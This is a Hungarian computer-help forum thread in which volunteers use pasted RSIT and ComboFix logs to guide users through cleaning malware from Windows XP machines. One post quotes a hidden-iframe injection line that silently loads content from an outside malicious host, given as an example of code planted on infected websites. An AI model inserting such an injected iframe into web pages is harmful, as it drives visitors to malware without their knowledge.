2009-06-10 21:14:28 ----D---- C:\WINDOWS\system32\CatRoot
2009-06-10 20:24:06 ----D---- C:\WINDOWS\Help
2009-06-10 20:24:04 ----D---- C:\Program Files\ASUS
2009-06-10 20:24:03 ----HD---- C:\Program Files\InstallShield Installation Information
2009-06-10 20:14:24 ----A---- C:\WINDOWS\Ascd_log.ini
2009-06-10 20:13:42 ----D---- C:\WINDOWS\system32\RTCOM
2009-06-10 20:08:02 ----A---- C:\WINDOWS\AS_Debug.txt
2009-06-10 19:49:28 ----A---- C:\boot.ini.comodofirewall
2009-06-10 19:48:46 ----A---- C:\WINDOWS\Ascd_tmp.ini
2009-06-09 18:55:43 ----D---- C:\Program Files\XRECODE
2009-06-09 16:00:00 ----D---- C:\Program Files\ChrisTV
2009-06-08 22:39:30 ----D---- C:\Program Files\AviSynth 2.5
2009-06-08 22:11:56 ----D---- C:\Program Files\MoBiMouse
2009-06-08 22:07:23 ----D---- C:\Documents and Settings\PALI\Application Data\InstallShield
2009-06-08 22:07:23 ----D---- C:\Documents and Settings\All Users\Application Data\InstallShield
2009-06-08 21:54:00 ----A---- C:\WINDOWS\IE4 Error Log.txt
2009-06-08 21:34:53 ----D---- C:\Program Files\Real Alternative
2009-06-08 18:23:47 ----D---- C:\WINDOWS\system32\config
2009-06-06 22:45:43 ----D---- C:\Documents and Settings\PALI\Application Data\Free Download Manager
2009-06-06 22:45:02 ----AD---- C:\Program Files\USDownloader - Cap
2009-06-06 15:44:32 ----D---- C:\Documents and Settings\PALI\Application Data\Simple Sudoku
2009-06-06 15:40:57 ----D---- C:\Program Files\RapidSolution
2009-06-06 15:26:39 ----D---- C:\Program Files\Daniusoft
2009-06-05 00:40:27 ----A---- C:\WINDOWS\DUMP691a.tmp
2009-06-02 04:23:08 ----D---- C:\WINDOWS\Minidump

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 Aavmker4;avast! Asynchronous Virus Monitor; C:\WINDOWS\system32\drivers\Aavmker4.sys [2009-02-05 26944]
R1 AFS2K;AFS2k; C:\WINDOWS\system32\drivers\AFS2K.sys [2008-03-04 82380]
R1 AmdK8;AMD processzor-illesztőprogram; C:\WINDOWS\system32\DRIVERS\AmdK8.sys [2006-06-19 43520]
R1 AsIO;AsIO; C:\WINDOWS\system32\drivers\AsIO.sys [2006-10-18 12664]
R1 asuskbnt;Enhanced Display Driver Helper Service; C:\WINDOWS\system32\drivers\atkkbnt.sys [2007-10-23 11136]
R1 aswSP;avast! Self Protection; C:\WINDOWS\system32\drivers\aswSP.sys [2009-02-05 114768]
R1 aswTdi;avast! Network Shield Support; C:\WINDOWS\system32\drivers\aswTdi.sys [2009-02-05 51376]
R1 CmdMon;Comodo Application Engine; C:\WINDOWS\System32\DRIVERS\cmdmon.sys [2009-06-18 75520]
R1 ElbyCDIO;ElbyCDIO Driver; C:\WINDOWS\System32\Drivers\ElbyCDIO.sys [2007-08-07 25160]
R1 nltdi;nltdi; \??\C:\WINDOWS\system32\drivers\nltdi.sys []
R1 PCLEPCI;PCLEPCI; \??\C:\WINDOWS\system32\drivers\pclepci.sys []
R1 PQNTDrv;PQNTDrv; C:\WINDOWS\system32\drivers\PQNTDrv.sys [2002-09-16 4228]
R1 SASDIFSV;SASDIFSV; \??\C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS []
R1 SASKUTIL;SASKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys []
R1 USIUDF;USIUDF; C:\WINDOWS\System32\Drivers\USIUDF.sys [2004-07-07 292896]
R2 Aspi32;Aspi32; C:\WINDOWS\System32\drivers\aspi32.sys [2002-07-17 16877]
R2 aswFsBlk;aswFsBlk; C:\WINDOWS\system32\DRIVERS\aswFsBlk.sys [2009-02-05 20560]
R2 aswMon2;avast! Standard Shield Support; C:\WINDOWS\system32\drivers\aswMon2.sys [2009-02-05 94032]
R2 thdudf;TOSHIBA UDF2.5 Reader File System Driver; C:\WINDOWS\system32\DRIVERS\thdudf.sys [2006-11-11 66944]
R2 tifsfilter;Acronis True Image FS Filter; C:\WINDOWS\system32\DRIVERS\tifsfilt.sys [2008-03-10 44384]
R3 AmdLLD;AMD Low Level Device Driver; C:\WINDOWS\system32\DRIVERS\AmdLLD.sys [2007-06-29 34304]
R3 Arp1394;1394 ARP ügyfélprotokoll; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2004-08-18 60800]
R3 ASAPIW2K;ASAPIW2K; C:\WINDOWS\System32\Drivers\ASAPIW2K.sys [2005-02-23 11264]
R3 asusgsb;ASUS Virtual Video Capture Device Driver; C:\WINDOWS\system32\drivers\asusgsb.sys [2007-10-23 12416]
R3 aswRdr;aswRdr; C:\WINDOWS\system32\drivers\aswRdr.sys [2009-02-05 23152]
R3 ati2mtag;ati2mtag; C:\WINDOWS\system32\DRIVERS\ati2mtag.sys [2009-03-16 3597312]
R3 AtiHdmiService;ATI Function Driver for HDMI Service; C:\WINDOWS\system32\drivers\AtiHdmi.sys [2009-02-26 99856]
R3 cFosSpeed;cFosSpeed Miniport; C:\WINDOWS\system32\DRIVERS\cfosspeed.sys [2007-10-17 707024]
R3 ElbyCDFL;ElbyCDFL; C:\WINDOWS\System32\Drivers\ElbyCDFL.sys [2007-02-16 34760]
R3 FET5X86V;VIA Rhine-Family Fast-Ethernet Adapter Driver Service; C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys [2007-04-17 42496]
R3 GearAspiWDM;GEARAspiWDM; C:\WINDOWS\system32\drivers\gearaspiwdm.sys [2006-11-14 15664]
R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2005-01-07 138752]
R3 hidusb;Microsoft HID osztályú illesztőprogram; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2004-08-18 9600]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2007-02-03 4474368]
R3 LVCap138;TV Card Capture Driver; C:\WINDOWS\system32\DRIVERS\tvcap.sys [2004-09-20 308736]
R3 lvtuner;Mercury TV Card WDM TV Tuner; C:\WINDOWS\system32\DRIVERS\tvtuner.sys [2004-09-20 16512]
R3 MarvinBus;Pinnacle Marvin Bus; C:\WINDOWS\system32\DRIVERS\MarvinBus.sys [2005-06-02 171008]
R3 MTsensor;ATK0110 ACPI UTILITY; C:\WINDOWS\system32\DRIVERS\ASACPI.sys [2004-08-14 5810]
R3 NIC1394;1394 hálózati illesztőprogram; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2004-08-18 61824]
R3 pcouffin;VSO Software pcouffin; C:\WINDOWS\System32\Drivers\pcouffin.sys [2008-03-03 47360]
R3 tbhsd;Tunebite High-Speed Dubbing; C:\WINDOWS\system32\drivers\tbhsd.sys [2008-11-04 43552]
R3 ULCDRHlp;ULCDRHlp; C:\WINDOWS\System32\Drivers\ULCDRHlp.sys [2004-12-23 27392]
R3 usbccgp;Microsoft USB általános szülő-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2004-08-04 31616]
R3 usbehci;Microsoft USB 2.0 bővített állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2004-08-18 26624]
R3 usbhub;Microsoft USB szabványos hub-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2004-08-18 57600]
R3 usbprint;Microsoft USB PRINTER osztály; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2004-08-04 25856]
R3 usbscan;USB-képolvasó illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2004-08-03 15104]
R3 usbuhci;Microsoft USB univerzális állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2004-08-18 20480]
R3 Video3D;ASUS Video3D Service; C:\WINDOWS\System32\Drivers\Video3D32.sys [2007-10-23 10752]
S2 PStrip;PSTRIP; \??\C:\WINDOWS\system32\DRIVERS\PSTRIP.SYS []
S2 SOFTLOK;SOFTLOK; C:\WINDOWS\system32\drivers\SOFTLOK.sys []
S3 a22bl5ef;a22bl5ef; C:\WINDOWS\system32\drivers\a22bl5ef.sys []
S3 a40c7wab;a40c7wab; C:\WINDOWS\system32\drivers\a40c7wab.sys []
S3 agir9xyh;agir9xyh; C:\WINDOWS\system32\drivers\agir9xyh.sys []
S3 al3tbqf1;al3tbqf1; C:\WINDOWS\system32\drivers\al3tbqf1.sys []
S3 CCDECODE;Feliratdekódoló; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2004-08-04 17024]
S3 FETNDIS;VIA PCI 10/100Mb Fast Ethernet adapter NT-illesztőprogramja; C:\WINDOWS\system32\DRIVERS\fetnd5.sys [2001-08-17 27165]
S3 HdAudAddService;ATI Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\AtiHdAud.sys [2006-12-28 84992]
S3 mbr;mbr; \??\C:\DOCUME~1\PALI\LOCALS~1\Temp\mbr.sys []
S3 MSTEE;Microsoft Streaming Tee/Sink - Sink átalakító; C:\WINDOWS\system32\drivers\MSTEE.sys [2004-08-03 5504]
S3 NABTSFEC;NABTS/FEC VBI kodek; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2004-08-04 85376]
S3 NdisIP;Microsoft TV-/videokapcsolat; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2004-08-04 10880]
S3 PCANDIS5;PCANDIS5; \??\C:\PROGRA~1\MATVAD~1\PCANDIS5.SYS []
S3 RkPavproc1;RkPavproc1; \??\C:\WINDOWS\system32\drivers\RkPavproc1.sys []
S3 SASENUM;SASENUM; \??\C:\Program Files\SUPERAntiSpyware\SASENUM.SYS []
S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2004-08-04 11136]
S3 SndTAudio;SndTAudio; C:\WINDOWS\system32\drivers\SndTAudio.sys [2009-02-03 23096]
S3 SndTVideo;SndTVideo; C:\WINDOWS\system32\DRIVERS\SndTVideo.sys [2009-02-03 3768]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2004-08-04 15360]
S3 SymIM;Symantec Network Security Intermediate Filter Service; C:\WINDOWS\system32\DRIVERS\SymIM.sys []
S3 SymIMMP;SymIMMP; C:\WINDOWS\system32\DRIVERS\SymIM.sys []
S3 TNPacket;T-Systems Nova Packet Capture Driver; \??\C:\PROGRA~1\MATVAD~1\TNPACKET.SYS []
S3 USBSTOR;USB háttértár illesztőprogramja; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2004-08-04 26496]
S3 WSTCODEC;World Standard Teletext kodek; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2004-08-04 19328]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-28 82944]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []
S4 sr;Rendszer-helyreállító szűrő illesztőprogramja; C:\WINDOWS\system32\DRIVERS\sr.sys [2004-08-18 73472]
S4 WS2IFSL;Windows Socket 2.0 - nem IFS-t szolgáltató támogatási környezet; C:\WINDOWS\System32\drivers\ws2ifsl.sys [2004-08-18 12032]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 AcrSch2Svc;Acronis Scheduler2 Service; C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe [2007-09-14 427288]
R2 aswUpdSv;avast! iAVS4 Control Service; C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe [2009-02-05 18752]
R2 ATKKeyboardService;ATK Keyboard Service; C:\WINDOWS\ATKKBService.exe [2007-10-23 262144]
R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast4\ashServ.exe [2009-02-05 138680]
R2 cFosSpeedS;cFosSpeed System Service; C:\Program Files\cFosSpeed\spd.exe [2007-10-17 310224]
R2 CmdAgent;Comodo Application Agent; C:\Program Files\Comodo\Firewall\cmdagent.exe [2009-06-18 361040]
R2 Diskeeper;Diskeeper; C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe [2007-10-16 1094936]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-01-14 152984]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2006-10-19 61440]
R2 LvHidSvc;Remote HID Service; C:\WINDOWS\system32\lvhidsvc.exe [2004-03-25 32256]
R2 MDM;Machine Debug Manager; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE [2003-06-20 322120]
R2 nlsvc;NetLimiter; C:\Program Files\NetLimiter 2 Pro\nlsvc.exe [2007-03-21 516096]
R2 NMSAccessU;NMSAccessU; C:\Program Files\CDBurnerXP\NMSAccessU.exe [2008-03-09 71096]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2006-03-03 69632]
R2 sdAuxService;PC Tools Auxiliary Service; C:\Program Files\Spyware Doctor\pctsAuxs.exe [2009-01-07 348752]
R2 sdCoreService;PC Tools Security Service; C:\Program Files\Spyware Doctor\pctsSvc.exe [2009-01-21 1095560]
R2 TryAndDecideService;Acronis Try And Decide Service; C:\Program Files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe [2007-09-14 492600]
R2 UleadBurningHelper;Ulead Burning Helper; C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [2007-01-18 67056]
R2 VC5SecS;Virtual CD v5 Security service; C:\Program Files\HHVcdV5Sys\VC5SecS.exe [2003-11-07 147456]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe [2009-02-05 254040]
R3 lxcc_device;lxcc_device; C:\WINDOWS\system32\lxcccoms.exe [2005-07-06 466944]
S02000000 OMSCAN;OMSCAN; \Sys []
S2 Ati HotKey Poller;Ati HotKey Poller; C:\WINDOWS\system32\Ati2evxx.exe [2009-03-16 602112]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [2009-02-05 72704]
S3 aspnet_state;ASP.NET-állapotszolgáltatás; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2008-07-25 34312]
S3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast4\ashWebSv.exe [2009-02-05 352920]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2008-07-25 69632]
S3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe [2008-07-29 46104]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [2005-04-04 69632]
S3 idsvc;Windows CardSpace; c:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2008-07-29 881664]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2004-08-18 14336]
S4 NetTcpPortSharing;Net.Tcp portmegosztási szolgáltatás; c:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2008-07-29 132096]

-----------------EOF-----------------


pén. jún. 19, 2009 11:21
Profil Privát üzenet küldése
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
ok , csinálom .....délután üdv


pén. jún. 19, 2009 9:07
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
:D :D udv
Csak delutan lesz idom olyan 4-5 ora korul,de adig futasd le az RSIT programot es a logjat log.txt ted ide
http://images.malwareremoval.com/random/RSIT.exe
futasd-klik-continue ,,,


pén. jún. 19, 2009 8:16
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
Szia stell , de jó , hogy még mindig vagy .... decemberben és januárban sokat takarítottunk nálam , most megint van nálam valami , folyamatosan Gen Host Proc hibával megszünik a net kapcsolatom , és a Spyware Doctor folyamatosan rengeteg böngészőférget talál , tehát valami betelepedett hozzám.....segíts , az Avast valami DHCP behatoláskisérletet jelent sokszor , Comodo tűzfalam van ....várom utasításaid :)


pén. jún. 19, 2009 7:40
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
igen ugy ahogy irtam a web oldal tulajdonasa hibaja nem a tied,,


csüt. jún. 18, 2009 17:41
Profil Privát üzenet küldése Honlap
ezüst tag

Csatlakozott: kedd feb. 24, 2009 11:19
Hozzászólások: 25
Hozzászólás 
Igen, az avast azt írta ki, hogy Ilframe.inf vírussal fertőzött az oldal.


csüt. jún. 18, 2009 17:06
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
Igen ez most a hitt,a TC-keresztul lopjak a jelszot aki -FTP-clientkent hasznalja>at tortek a sifrat,,a TC-ben.
It az a hejzet hogy ma mar majd minden web oldal megvan ferozve,itt nemcsak a porno,warez meg hasonlo szurke webrol van szo hanem legalis oldalakrol,A weboldal tulajdonosa pucolja le mert biztos fertozot az oldal,a te geped renben van,meert az avast ismeri ezt a virust.Mar it irtunk is errol
Kód:
<iframe src="http://mixante.cn/in.cgi?income54" width=1 height=1 style="visibility: hidden"></iframe>

ilyenrol van szo
udv ,


csüt. jún. 18, 2009 16:31
Profil Privát üzenet küldése Honlap
ezüst tag

Csatlakozott: kedd feb. 24, 2009 11:19
Hozzászólások: 25
Hozzászólás 
A gépemre nem került fel, mivel az avast blokkolta és kiírta, hogy kapcsolat megszakítása. Ezután végig futtattam több keresőt, irtót is (avast, spyware terminator, malwarebytes-anit malware), de egyik sem talált semmit. Tűzfal az outpost van fenn, remélem az elég jó. Engem az zavar, hogy akárhányszor az oldal betöltődik az avast visít, hogy vírus. Tartok tőle, hogy valami kárt tesz, ezért nem is merem megnyitni az oldalt.


csüt. jún. 18, 2009 11:30
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. szept. 12, 2004 18:08
Hozzászólások: 6037
Tartózkodási hely: Usa
Hozzászólás 
Leirtod a férget,utána meg felteszel egy normális firewall-t ami jelez ha az oldalról bármi akar töltődni a tudtodon kívül.


csüt. jún. 18, 2009 1:37
Profil Privát üzenet küldése ICQ YIM Honlap
ezüst tag

Csatlakozott: kedd feb. 24, 2009 11:19
Hozzászólások: 25
Hozzászólás 
Van egy oldal amit minden nap látogatok. Eddig nem volt vele semmi probléma és kb. 2 napja az avast egy férget jelez. Ezzel mit lehet kezdeni?


szer. jún. 17, 2009 21:47
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
okes,akor azt hiszem hogy renben van,ha nincsenek mar mas problemak
udv


csüt. jún. 04, 2009 10:24
Profil Privát üzenet küldése Honlap
platina tag
Avatar

Csatlakozott: szer. márc. 24, 2004 13:43
Hozzászólások: 595
Hozzászólás 
stell írta:
2/40 az ok
aha a combofix is kivit valamit,,,meg ha idod lesz futasd a WEBCUREIT programot csokentet modban,amit talal gyogyitani,ha valamit talal akor maj ird ide a fertozes nevet,,a combofixet leszedheted a geprol
start-futatas-ird be combofix /u ok,
Pucold at CCleaneral
es majd meglasuk,


Átpucoltam a Webcureit-tel, talált 4 db fertőzést, de elfelejtettem :oops: és mint aki jól végezte a dolgát, letelepítettem a programot is. :cry:
Érdekes volt, hogy ez után, újraindítás után az Eset megint talált egy New Heur_PE vírust, valami tmp fájlt. Kiírtotta, azóta semmi.


csüt. jún. 04, 2009 8:39
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
2/40 az ok
aha a combofix is kivit valamit,,,meg ha idod lesz futasd a WEBCUREIT programot csokentet modban,amit talal gyogyitani,ha valamit talal akor maj ird ide a fertozes nevet,,a combofixet leszedheted a geprol
start-futatas-ird be combofix /u ok,
Pucold at CCleaneral
es majd meglasuk,


szomb. máj. 30, 2009 20:54
Profil Privát üzenet küldése Honlap
platina tag
Avatar

Csatlakozott: szer. márc. 24, 2004 13:43
Hozzászólások: 595
Hozzászólás 
stell írta:
c:\windows\system32\RunOnceEx.exe
teszteld le a Virustotalon,
VIRUSTOTALu


Az első eredmény 2/40 volt (TrojanSpy vagy ilyesmi,
http://www.virustotal.com/hu/analisis/2 ... 1240033083
a második ismételt vizsgálatnál 1/40 Medium Risk Malware.
http://www.virustotal.com/hu/analisis/2 ... 1243712744
Akkor most ezt hogy kell értelmezni?

Azt nem is mondtam, h már reggel lefutattam a Eset SS-t, eredmény, Spybot S&D eredmény 4 valami kiírtva, Malwarebyte 4-et talált.


A hozzászólást 1 alkalommal szerkesztették, utoljára AGyurma szomb. máj. 30, 2009 20:56-kor.



szomb. máj. 30, 2009 20:40
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
c:\windows\system32\RunOnceEx.exe
teszteld le a Virustotalon,
VIRUSTOTALu


szomb. máj. 30, 2009 20:22
Profil Privát üzenet küldése Honlap
platina tag
Avatar

Csatlakozott: szer. márc. 24, 2004 13:43
Hozzászólások: 595
Hozzászólás 
ComboFix 09-05-30.03 - Rendszergazda 009.05.30. 20:37.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.3.1250.36.1038.18.256.50 [GMT 2:00]
Running from: c:\documents and settings\Rendszergazda\Asztal\ComboFix.exe
AV: ESET Smart Security 3.0 *On-access scanning enabled* (Updated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
FW: ESET Személyi tűzfal *enabled* {E5E70D32-0101-4340-86A3-A7B0F1C8FFE0}
* Resident AV is active


WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\documents and settings\All Users\Start Menu\Programs\Internet Explorer.lnk
c:\documents and settings\Rendszergazda\Application Data\inst.exe
c:\windows\system32\lsprst7.dll
c:\windows\system32\ssprs.dll
c:\windows\system32\tmp14.tmp

.
((((((((((((((((((((((((( Files Created from 2009-04-28 to 2009-05-30 )))))))))))))))))))))))))))))))
.

2009-05-30 17:09 . 2009-05-30 17:09 -------- d-----w c:\program files\Trend Micro
2009-05-30 10:27 . 2008-10-16 12:09 43544 ----a-w c:\windows\system32\wups2.dll
2009-05-29 21:43 . 2009-05-29 21:43 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Malwarebytes
2009-05-29 21:43 . 2009-05-29 21:43 -------- d-----w c:\documents and settings\All Users\Application Data\Malwarebytes
2009-05-29 21:39 . 2009-05-29 21:39 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Auslogics
2009-05-29 21:36 . 2009-05-30 05:53 -------- d---a-w c:\documents and settings\All Users\Application Data\TEMP
2009-05-29 21:36 . 2009-05-29 21:36 -------- d-----w c:\program files\Acelogix
2009-05-29 20:58 . 2009-05-30 08:12 -------- d-----w c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2009-05-29 19:59 . 2009-05-29 19:59 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Foxit
2009-05-29 19:59 . 2009-05-29 19:59 -------- d-----w c:\program files\Foxit Software
2009-05-29 19:31 . 2008-08-31 19:47 238592 ----a-w c:\windows\system32\JkDefragScreenSaver.exe
2009-05-29 19:31 . 2008-08-31 19:47 98304 ----a-w c:\windows\system32\JkDefragScreenSaver.scr
2009-05-29 19:00 . 2009-05-29 19:01 -------- d-----w c:\program files\CCleaner
2009-05-06 17:46 . 2009-05-06 17:46 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Hewlett-Packard
2009-05-06 17:29 . 2009-05-06 17:29 82380 ----a-w c:\windows\system32\drivers\AFS2K.SYS
2009-05-06 17:11 . 2009-05-06 17:30 20807 ----a-w c:\windows\HPHins02.dat
2009-05-06 17:11 . 2004-01-16 20:56 4308 ------w c:\windows\hphmdl02.dat
2009-05-06 17:07 . 2009-05-06 17:07 -------- d-----w c:\windows\system32\NtmsData
2009-05-06 16:55 . 2003-12-11 09:15 626960 ----a-r c:\windows\system32\hpvaut32.dll
2009-05-06 16:55 . 2003-12-11 09:15 487424 ----a-r c:\windows\system32\hpvcp70.dll
2009-05-06 16:55 . 2003-12-11 09:15 344064 ----a-r c:\windows\system32\hpvcr70.dll
2009-05-06 16:54 . 2009-05-06 16:55 -------- d-----w c:\program files\HP
2009-05-06 16:54 . 2004-03-18 14:56 204800 ----a-w c:\windows\system32\HPZipr12.dll
2009-05-06 16:54 . 2004-03-18 14:55 65536 ----a-w c:\windows\system32\HPZipm12.exe
2009-05-06 16:54 . 2004-03-18 14:53 278584 ----a-w c:\windows\system32\HPZidr12.dll
2009-05-06 16:54 . 2004-03-18 14:39 57344 ----a-w c:\windows\system32\HPZisn12.dll
2009-05-06 16:54 . 2004-03-18 14:39 94208 ----a-w c:\windows\system32\HPZipt12.dll
2009-05-06 16:54 . 2004-03-18 14:38 61440 ----a-w c:\windows\system32\HPZinw12.exe
2009-05-06 16:54 . 1998-10-29 14:45 306688 ----a-w c:\windows\IsUninst.exe
2009-05-06 16:52 . 2009-05-29 19:17 -------- d-----w c:\documents and settings\All Users\Application Data\Comodo
2009-05-06 16:51 . 2009-05-29 19:33 -------- d-----w c:\program files\COMODO
2009-05-06 16:41 . 2009-05-29 19:59 -------- d-----w c:\program files\Hewlett-Packard
2009-05-06 16:41 . 2005-07-08 04:55 51088 ----a-w c:\windows\system32\drivers\hpzid412.sys
2009-05-06 16:41 . 2005-07-08 04:55 21744 ----a-w c:\windows\system32\drivers\HPZius12.sys
2009-05-06 16:41 . 2005-07-08 04:55 16496 ----a-w c:\windows\system32\drivers\HPZipr12.sys
2009-05-06 16:40 . 2005-07-08 04:55 270336 ----a-w c:\windows\system32\HPZc3212.dll
2009-05-06 16:40 . 2003-12-04 23:15 258048 ----a-w c:\windows\system32\hpzcon09.dll
2009-05-06 16:40 . 2003-12-04 23:21 135224 ----a-w c:\windows\system32\hpzlnt09.dll
2009-05-06 16:40 . 2003-12-04 23:14 192512 ----a-w c:\windows\system32\hpzcoi09.dll

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-05-30 18:33 . 2008-11-01 09:23 66 ----a-w c:\windows\runonceex.bat
2009-05-30 08:46 . 2008-11-01 09:41 -------- d-----w c:\program files\VideoLAN
2009-05-30 06:37 . 2004-08-18 12:00 90984 ----a-w c:\windows\system32\perfc00E.dat
2009-05-30 06:37 . 2004-08-18 12:00 409256 ----a-w c:\windows\system32\perfh00E.dat
2009-05-29 21:25 . 2008-11-01 09:43 -------- d-----w c:\program files\Paint.NET
2009-05-29 21:21 . 2008-11-01 09:41 -------- d-----w c:\program files\Mozilla Thunderbird
2009-05-29 20:48 . 2008-11-01 09:46 -------- d-----w c:\program files\ESET
2009-05-29 20:00 . 2008-11-02 20:21 -------- d-----w c:\program files\Logitech
2009-05-29 19:29 . 2008-11-01 09:31 -------- d-----w c:\program files\Opera
2009-05-29 19:28 . 2008-11-01 09:30 -------- d-----w c:\program files\Elaborate Bytes
2009-05-29 19:27 . 2008-11-01 09:30 -------- d-----w c:\program files\SlySoft
2009-05-29 19:27 . 2008-11-01 09:20 -------- d-----w c:\program files\CMenu
2009-05-29 19:26 . 2008-11-01 09:19 -------- d-----w c:\program files\Unlocker
2009-05-29 19:26 . 2008-11-01 09:42 -------- d-----w c:\program files\Winamp
2009-05-29 19:25 . 2008-11-01 09:32 -------- d-----w c:\program files\TC PowerPack
2009-05-29 19:24 . 2008-11-01 09:34 -------- d-----w c:\program files\Notepad++
2009-05-29 19:24 . 2008-11-01 09:49 -------- d-----w c:\program files\GameHouse
2009-05-29 19:22 . 2008-11-01 09:36 -------- d--h--w c:\program files\InstallShield Installation Information
2009-05-29 19:17 . 2008-11-01 09:45 -------- d-----w c:\documents and settings\Rendszergazda\Application Data\Vso
